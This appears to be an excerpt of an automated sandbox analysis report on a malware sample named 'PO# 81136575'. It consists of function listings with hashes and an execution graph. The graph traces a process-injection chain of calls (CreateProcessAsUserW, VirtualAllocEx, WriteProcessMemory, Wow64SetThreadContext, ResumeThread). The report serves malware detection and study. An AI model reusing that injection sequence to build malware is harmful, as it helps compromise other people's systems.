                                                                                                                                                • Instruction Fuzzy Hash: 0BF06D74D18208EFCB44EFB9E4082EDBFF4EB4A311F6484AAD80993215E3310A54CB40
                                                                                                                                                Function 03130FE8 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 338c5e54e5d6089de054ce16050fd13448736b2968d0628cc2a9253ce06df4a6
                                                                                                                                                • Instruction ID: f314bd561c791d5f4b3ab91fb6fe01429a04be4b7f1cf000355be56327097d28
                                                                                                                                                • Opcode Fuzzy Hash: 338c5e54e5d6089de054ce16050fd13448736b2968d0628cc2a9253ce06df4a6
                                                                                                                                                • Instruction Fuzzy Hash: 6DE04F34D04208EFCB04EFAAE54829CBBF8AB49311F5084B5D80993204E7314B90CB80
                                                                                                                                                Function 077B725D Relevance: .0, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1259751991.00000000077B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 077B0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_77b0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 080e727b48d394da475d21c450c75c1698229a478a6619cde7d5fdb1b4ae528a
                                                                                                                                                • Instruction ID: c526938039f93045047bd472de66bbd2fc41d89228c292c2a8cc3db575c79593
                                                                                                                                                • Opcode Fuzzy Hash: 080e727b48d394da475d21c450c75c1698229a478a6619cde7d5fdb1b4ae528a
                                                                                                                                                • Instruction Fuzzy Hash: F3E01270A01245DFC72D6F30F81D59537B4EF59211344489FF40685659DB348486CBA1
                                                                                                                                                Function 03138608 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction ID: 7eccc7e6796227e5fde1534afa5de9f7597c43d7d11c22558a96f917df3268f8
                                                                                                                                                • Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
                                                                                                                                                • Instruction Fuzzy Hash: 72C0807354C1382BD234504E7C40DA3774CD3C63B4E150177F51CD320054429C8501F4
                                                                                                                                                Function 03136458 Relevance: .0, Instructions: 17COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 1ad7e24ab0d2089258ed356abfeed135eb775436618d63f0d91d803b7cd104e9
                                                                                                                                                • Instruction ID: a893135450c27d5c5a4e0bd68654b8b6bd0509a051575dcd0f3f210c1953cc51
                                                                                                                                                • Opcode Fuzzy Hash: 1ad7e24ab0d2089258ed356abfeed135eb775436618d63f0d91d803b7cd104e9
                                                                                                                                                • Instruction Fuzzy Hash: A9E02BB1D54B056BD74ED775FCA4F483BBDEF81304F40C1A184028676AD63C8805CB21
                                                                                                                                                Function 03136468 Relevance: .0, Instructions: 12COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1251679961.0000000003130000.00000040.00000800.00020000.00000000.sdmp, Offset: 03130000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_3130000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 3b5f07e39d94bbfb4a636213b75852a9c0f27f4053868ccabf385a4ba4505841
                                                                                                                                                • Instruction ID: c9b74c3bbd5da7a3fe0c4af9f201afd461a9d0c20f95cde05edce3bcbe2d5fba
                                                                                                                                                • Opcode Fuzzy Hash: 3b5f07e39d94bbfb4a636213b75852a9c0f27f4053868ccabf385a4ba4505841
                                                                                                                                                • Instruction Fuzzy Hash: 46C02271600A0917C30CE339F828D0437AEEBC0200FC0C01091064531CDE7CAC05C3A1

                                                                                                                                                Non-executed Functions

                                                                                                                                                Function 07271408 Relevance: 3.2, Instructions: 3210COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258811776.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_7270000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2d284875d20460ab947b925fc68638be590dd2880c2e6f99a75bcb69b2dda2a0
                                                                                                                                                • Instruction ID: 68b0cb8e00083a59a1642d9257bf62185763be9a32b74f4c9e6726703b25e20f
                                                                                                                                                • Opcode Fuzzy Hash: 2d284875d20460ab947b925fc68638be590dd2880c2e6f99a75bcb69b2dda2a0
                                                                                                                                                • Instruction Fuzzy Hash: 87536DB0E14219CBCB14FFB8E99966DBBB5EB89300F8085E9D548B3340DA385D89CF55
                                                                                                                                                Function 072EF2C0 Relevance: 2.1, Strings: 1, Instructions: 804COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: F
                                                                                                                                                • API String ID: 0-2945319695
                                                                                                                                                • Opcode ID: afa91f6ab0c7793b610553b21621a1bc32f0b2cf256d43e6e151dc8fc99a2568
                                                                                                                                                • Instruction ID: c89ca4af6a28cfe8a8b872b7eca9dc740e97d9ba7503a2b2ecf3cc86afd6c8b1
                                                                                                                                                • Opcode Fuzzy Hash: afa91f6ab0c7793b610553b21621a1bc32f0b2cf256d43e6e151dc8fc99a2568
                                                                                                                                                • Instruction Fuzzy Hash: A962D071F04315CFCB15EBB8D89866EBBB2EF8A200F5185AAD449EB350DE389C45CB51
                                                                                                                                                Function 072EF2B0 Relevance: .6, Instructions: 650COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: c82ed5157266afd5341a330afa05b190cee15b3009e2b6a3eb096b9da3f2c79b
                                                                                                                                                • Instruction ID: a6f475081c8c66d91ef03bea1ee61a6f8c65d62019d11b5d31bb8a7c8059091d
                                                                                                                                                • Opcode Fuzzy Hash: c82ed5157266afd5341a330afa05b190cee15b3009e2b6a3eb096b9da3f2c79b
                                                                                                                                                • Instruction Fuzzy Hash: 66429D71F10215CFCB14EBB8D89966EBBB2FF89200F5189A9D449EB350DE389C85CB51
                                                                                                                                                Function 072E68F0 Relevance: .3, Instructions: 260COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000000.00000002.1258932762.00000000072E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072E0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_0_2_72e0000_PO# 81136575.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 43a02e4b5facc07d1c28a062fe3e4611c0c0ae6f6eafe71fc769de669b1dacff
                                                                                                                                                • Instruction ID: af9004a5b39550f54ff89c40229635f3e7fec9e5a73c3cb7858369cbf22a58e2
                                                                                                                                                • Opcode Fuzzy Hash: 43a02e4b5facc07d1c28a062fe3e4611c0c0ae6f6eafe71fc769de669b1dacff
                                                                                                                                                • Instruction Fuzzy Hash: FB819F75B242189BDF189BB484946BFBAB7BFC8710B44C52DE442E7388CE3888068791

                                                                                                                                                Execution Graph

                                                                                                                                                Execution Coverage:26%
                                                                                                                                                Dynamic/Decrypted Code Coverage:50%
                                                                                                                                                Signature Coverage:7.8%
                                                                                                                                                Total number of Nodes:90
                                                                                                                                                Total number of Limit Nodes:7
                                                                                                                                                execution_graph 44374 6f66070 44375 6f660b0 ResumeThread 44374->44375 44377 6f660e1 44375->44377 44449 6f1e198 44450 6f1e1cb 44449->44450 44451 6f1e5f9 44450->44451 44454 6f60d4a 44450->44454 44459 6f60d58 44450->44459 44456 6f60d7f 44454->44456 44455 6f60e43 44455->44450 44456->44455 44464 6f630d5 44456->44464 44468 6f630e0 44456->44468 44461 6f60d7f 44459->44461 44460 6f60e43 44460->44450 44461->44460 44462 6f630d5 CreateProcessAsUserW 44461->44462 44463 6f630e0 CreateProcessAsUserW 44461->44463 44462->44461 44463->44461 44465 6f6315f CreateProcessAsUserW 44464->44465 44467 6f63260 44465->44467 44469 6f6315f CreateProcessAsUserW 44468->44469 44471 6f63260 44469->44471 44378 fcc8900 44381 fcc6a80 44378->44381 44380 fcc891b 44382 fcc6a9a 44381->44382 44383 fcc6aab RtlAllocateHeap 44382->44383 44383->44380 44472 fcb1a67 44473 fcb1a0f 44472->44473 44474 fcb1a73 44472->44474 44475 fcb1a20 LdrLoadDll 44473->44475 44476 fcb1a37 44473->44476 44475->44476 44384 2a4dcb0 44386 2a4dcc0 44384->44386 44385 2a4eea1 44386->44385 44389 6c00040 44386->44389 44394 6c00007 44386->44394 44390 6c0006a 44389->44390 44391 6c057a7 44390->44391 44399 6c06400 44390->44399 44403 6c06410 44390->44403 44391->44385 44395 6c0001b 44394->44395 44396 6c057a7 44395->44396 44397 6c06400 DeleteFileW 44395->44397 44398 6c06410 DeleteFileW 44395->44398 44396->44385 44397->44396 44398->44396 44407 6c06588 44399->44407 44411 6c0655c 44399->44411 44400 6c0642a 44400->44391 44404 6c0642a 44403->44404 44405 6c06588 DeleteFileW 44403->44405 44406 6c0655c DeleteFileW 44403->44406 44404->44391 44405->44404 44406->44404 44408 6c0659f 44407->44408 44415 6c06c78 44408->44415 44412 6c06555 44411->44412 44412->44411 44414 6c06c78 DeleteFileW 44412->44414 44413 6c0683a 44413->44400 44414->44413 44416 6c06c8f 44415->44416 44419 6c06fd8 44416->44419 44420 6c0701e DeleteFileW 44419->44420 44422 6c0683a 44420->44422 44422->44400 44423 6f64ca0 44424 6f64ce5 Wow64GetThreadContext 44423->44424 44426 6f64d2d 44424->44426 44427 6f133a8 44428 6f133b1 VirtualProtect 44427->44428 44430 6f1342a 44428->44430 44431 fca2910 44434 fca2922 44431->44434 44432 fca29bd 44433 fca2946 Sleep 44433->44434 44434->44432 44434->44433 44477 fca2070 44479 fca2091 44477->44479 44478 fca20fa 44479->44478 44480 fca20e7 CreateThread 44479->44480 44435 fcc8790 44438 fcc68c0 44435->44438 44437 fcc87c1 44439 fcc68eb 44438->44439 44440 fcc6955 44438->44440 44439->44437 44441 fcc696b NtAllocateVirtualMemory 44440->44441 44441->44437 44442 6f65b68 44443 6f65bb0 VirtualProtectEx 44442->44443 44445 6f65bee 44443->44445 44481 6f656c8 44482 6f65710 WriteProcessMemory 44481->44482 44484 6f65767 44482->44484 44485 6f65e08 44486 6f65e4d Wow64SetThreadContext 44485->44486 44488 6f65e95 44486->44488 44489 6f65388 44490 6f653c8 VirtualAllocEx 44489->44490 44492 6f65405 44490->44492

                                                                                                                                                Executed Functions

                                                                                                                                                Function 070D0040 Relevance: 5.5, Instructions: 5499COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 1058 70d0040-70d0275 1086 70d22cf-70d257b 1058->1086 1087 70d027b-70d0f8a 1058->1087 1154 70d345a-70d43ea 1086->1154 1155 70d2581-70d3452 1086->1155 1485 70d1309-70d22c7 1087->1485 1486 70d0f90-70d1301 1087->1486 1716 70d476f-70d4782 1154->1716 1717 70d43f0-70d4767 1154->1717 1155->1154 1485->1086 1486->1485 1721 70d4788-70d4dba 1716->1721 1722 70d4dc2-70d5c4e 1716->1722 1717->1716 1721->1722 2105 70d5c4e call 70d725d 1722->2105 2106 70d5c4e call 70d726c 1722->2106 2107 70d5c4e call 70d7290 1722->2107 2103 70d5c54-70d5c5b 2105->2103 2106->2103 2107->2103
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6021000436.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_70d0000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 2aa8ee8ee36275c72056382084307aef1065d328c6a34651d0f0fb4d5fa193e5
                                                                                                                                                • Instruction ID: 856a9bdb3be546ff69247eb62976682f33c11c319ec6848b28ce9aebbec2adcb
                                                                                                                                                • Opcode Fuzzy Hash: 2aa8ee8ee36275c72056382084307aef1065d328c6a34651d0f0fb4d5fa193e5
                                                                                                                                                • Instruction Fuzzy Hash: 38B31570A01328CFCB18EF78D98966CBBF2BB89301F4149A9D449A7354DF399E858F45
                                                                                                                                                Function 06F630E0 Relevance: 1.7, APIs: 1, Instructions: 164processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 06F6324B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                • Opcode ID: b891b745d4152ae26de6ecf772171e5654334ae0439bc68de0e9cad8706df395
                                                                                                                                                • Instruction ID: 7da732d89f7f4f18f68097073a3109c800ce6318e635bcea4ad049312b750f65
                                                                                                                                                • Opcode Fuzzy Hash: b891b745d4152ae26de6ecf772171e5654334ae0439bc68de0e9cad8706df395
                                                                                                                                                • Instruction Fuzzy Hash: 7551F771D00219DFDB64CF9AC840BDDBBB5BF48314F0484AAE819B7250DB759A89CF90
                                                                                                                                                Function 02A428B8 Relevance: 1.2, Instructions: 1151COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 5b184e7654fe65496c87b8904a745f748d1929d86839aa0d2a914e7a04165ce9
                                                                                                                                                • Instruction ID: 37babd488d47cd2650d35513dcd5896d242f598089c54407e5d483142e25be6b
                                                                                                                                                • Opcode Fuzzy Hash: 5b184e7654fe65496c87b8904a745f748d1929d86839aa0d2a914e7a04165ce9
                                                                                                                                                • Instruction Fuzzy Hash: EBA22F70A00219DFDB14DF69C894BAEBBB2BF89304F2581A9E805EB365DF34D941CB51
                                                                                                                                                Function 02A47058 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: d49526fa392c5ff1490bf5d518ad0629872ff45a2e33fe0145dc8c146ae654e6
                                                                                                                                                • Instruction ID: 517f634d0d2758efe0d2e8232b452d576f54a2a02b8343e859d9a01e12787fa3
                                                                                                                                                • Opcode Fuzzy Hash: d49526fa392c5ff1490bf5d518ad0629872ff45a2e33fe0145dc8c146ae654e6
                                                                                                                                                • Instruction Fuzzy Hash: A802B274E002588FDB64DFA9C980B9DFBB2BF89300F1481A9D449AB355DB349E85CF61
                                                                                                                                                Function 02A46588 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: 6afa8fcdf4d7093925eaf061707801a975684d288c8352474cb3436b84b6e2b0
                                                                                                                                                • Instruction ID: b7c48d8a1b54f35032702023105e7cbface8f43f4a9708256faec85dc4acede2
                                                                                                                                                • Opcode Fuzzy Hash: 6afa8fcdf4d7093925eaf061707801a975684d288c8352474cb3436b84b6e2b0
                                                                                                                                                • Instruction Fuzzy Hash: A4B18270704356CBEF681B36944473A7AFBAFC6F05F288429D886C6295CFB4C845CB66
                                                                                                                                                Function 02A46A70 Relevance: .1, Instructions: 142COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID:
                                                                                                                                                • Opcode ID: b65b908107cd9bff21b8028f5bdb18277bd1660d0d314e1588083bb25f8e06f6
                                                                                                                                                • Instruction ID: 491f8bc9b20874fcb250397d08e34f7fd697135e1c43ccfcb82a877a3b63b7f6
                                                                                                                                                • Opcode Fuzzy Hash: b65b908107cd9bff21b8028f5bdb18277bd1660d0d314e1588083bb25f8e06f6
                                                                                                                                                • Instruction Fuzzy Hash: 5751C075E00218CFDB18CFA6C598ADDBBB2BF89305F24846AE405AB364DB749946CF10
                                                                                                                                                Function 02A4CD30 Relevance: 2.4, Strings: 1, Instructions: 1109COMMON
                                                                                                                                                Download Yara Rule

                                                                                                                                                Control-flow Graph

                                                                                                                                                • Executed
                                                                                                                                                • Not Executed
                                                                                                                                                control_flow_graph 5818 2a4cd30-2a4cd61 call 2a4afe0 5821 2a4cd66-2a4d3b3 call 2a4aff0 call 2a4b000 call 2a4b010 5818->5821 5899 2a4d4b3-2a4d4c4 5821->5899 5900 2a4d3b8-2a4d3be 5899->5900 5901 2a4d4ca-2a4d5c6 5899->5901 5902 2a4d3c4-2a4d4ad call 2a4afc0 5900->5902 5903 2a4eeab-2a4f163 5900->5903 5930 2a4da26-2a4db3e call 2a4b070 5901->5930 5931 2a4d5cc-2a4d6dc 5901->5931 5902->5899 5942 2a4eea6 5902->5942 5981 2a4dc64-2a4dc72 5930->5981 5931->5942 5977 2a4d6e2-2a4d825 5931->5977 5942->5903 5977->5930 6028 2a4d82b-2a4d84a call 2a4b020 5977->6028 5986 2a4db43-2a4db75 5981->5986 5987 2a4dc78-2a4dc8b 5981->5987 5986->5981 6001 2a4db7b-2a4dc5f 5986->6001 5989 2a4dc92-2a4dca1 5987->5989 5996 2a4dca3 5989->5996 5997 2a4dcac 5989->5997 5996->5997 5997->5942 6039 2a4dc61 6001->6039 6040 2a4dc8d 6001->6040 6035 2a4d84c-2a4d851 6028->6035 6036 2a4d859-2a4d865 6028->6036 6035->6036 6036->5903 6037 2a4d86b-2a4da17 call 2a4b030 call 2a4b040 call 2a4b050 call 2a4b060 call 2a4b070 6036->6037 6037->5942 6069 2a4da1d-2a4da20 6037->6069 6039->5981 6040->5989 6069->5930 6069->6028
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: h3o
                                                                                                                                                • API String ID: 0-2140973757
                                                                                                                                                • Opcode ID: b0938cc9268b9fd8000ee222005567df8e8448e00527d6c4568873744b7cb291
                                                                                                                                                • Instruction ID: 327c4a392dd4f30787976edf21e31afb33b5693b6d70d9d290d10db3f50148b7
                                                                                                                                                • Opcode Fuzzy Hash: b0938cc9268b9fd8000ee222005567df8e8448e00527d6c4568873744b7cb291
                                                                                                                                                • Instruction Fuzzy Hash: 7AA23774E11219CFCB28EFB8D98979DBBB1BB88300F5089A9D449E3250DE389D85CF51
                                                                                                                                                Function 06F630D5 Relevance: 1.7, APIs: 1, Instructions: 171processCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • CreateProcessAsUserW.KERNEL32(?,?,?,0000000A,?,?,?,?,?,?,?), ref: 06F6324B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: CreateProcessUser
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2217836671-0
                                                                                                                                                • Opcode ID: a19e200056b6e0f8a764370a09b26ca5d0ae638c2b98e26bb2d06698b14bc4e9
                                                                                                                                                • Instruction ID: 22ee784a6f0f7c6b1de40280d41616c1ce220550a8b480f737381e275a14c31b
                                                                                                                                                • Opcode Fuzzy Hash: a19e200056b6e0f8a764370a09b26ca5d0ae638c2b98e26bb2d06698b14bc4e9
                                                                                                                                                • Instruction Fuzzy Hash: 4C511771D00219DFDB24CF9AC840BDDBBB5BF48314F0485AAE819B7250DB759A89CFA0
                                                                                                                                                Function 06F132C8 Relevance: 1.7, APIs: 1, Instructions: 167memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: 2d4201fb4b15206bda8c708626420dfb9af807d6bbbc0e97636721bd22517271
                                                                                                                                                • Instruction ID: 7e4114aab19ced5a700c9082fea6bb3ce52993124c90943c013730d1ab54eb41
                                                                                                                                                • Opcode Fuzzy Hash: 2d4201fb4b15206bda8c708626420dfb9af807d6bbbc0e97636721bd22517271
                                                                                                                                                • Instruction Fuzzy Hash: 0C410076802645AFCB10CFB5CC49ADBBFBEAB09340F24505AF855ABE01D7788645CBB1
                                                                                                                                                Function 06F1332D Relevance: 1.6, APIs: 1, Instructions: 119memoryCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • VirtualProtect.KERNEL32(?,?,?,?), ref: 06F1341B
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6019920570.0000000006F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F10000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f10000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                • Opcode ID: e8ad2a30033a46a4440a2dc40b88b4403acc01e5f12804bb34c184264ff09649
                                                                                                                                                • Instruction ID: 1e95f19d9e17b91e947b2b98756f2c51080253951f6b0622203dc3f0aee0ccee
                                                                                                                                                • Opcode Fuzzy Hash: e8ad2a30033a46a4440a2dc40b88b4403acc01e5f12804bb34c184264ff09649
                                                                                                                                                • Instruction Fuzzy Hash: 1631D075805249AFCB11CFB9CC49ADBBFF9AF09300F24905AF844ABA01D7385644CBB1
                                                                                                                                                Function 02A48B7F Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.5965299788.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_2a40000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID:
                                                                                                                                                • String ID: z6p^
                                                                                                                                                • API String ID: 0-2798388163
                                                                                                                                                • Opcode ID: 191a753d135770bd20cdec5ca297a79af017553f6a77efa681d6a26896e68a58
                                                                                                                                                • Instruction ID: 3c27ffbd6718101c808da677804f663333107dcb0fc02369deb2013ee3817171
                                                                                                                                                • Opcode Fuzzy Hash: 191a753d135770bd20cdec5ca297a79af017553f6a77efa681d6a26896e68a58
                                                                                                                                                • Instruction Fuzzy Hash: B2B129303052028FDB159B28EEA873977A6AFC5644F1944AAE516CF3A2EF2DCC41CB55
                                                                                                                                                Function 06F656C0 Relevance: 1.6, APIs: 1, Instructions: 71injectionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F65758
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_14_2_6f60000_sage.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                • Opcode ID: 28733e0a7e8e3d001b29abe20f418a772070c932c2ae24c0cb9572091804586c
                                                                                                                                                • Instruction ID: a9fa25111d8c59e3390d659547a892ddeb486af5d28ed57bf816d5484dd47f10
                                                                                                                                                • Opcode Fuzzy Hash: 28733e0a7e8e3d001b29abe20f418a772070c932c2ae24c0cb9572091804586c
                                                                                                                                                • Instruction Fuzzy Hash: 81212875D003499FDB10CFAAC9817DEBBF1FF48314F14842AE819A7241D7789955DBA0
                                                                                                                                                Function 06F656C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                Download Yara Rule
                                                                                                                                                APIs
                                                                                                                                                • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F65758
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 0000000E.00000002.6020260881.0000000006F60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F60000, based on PE: false
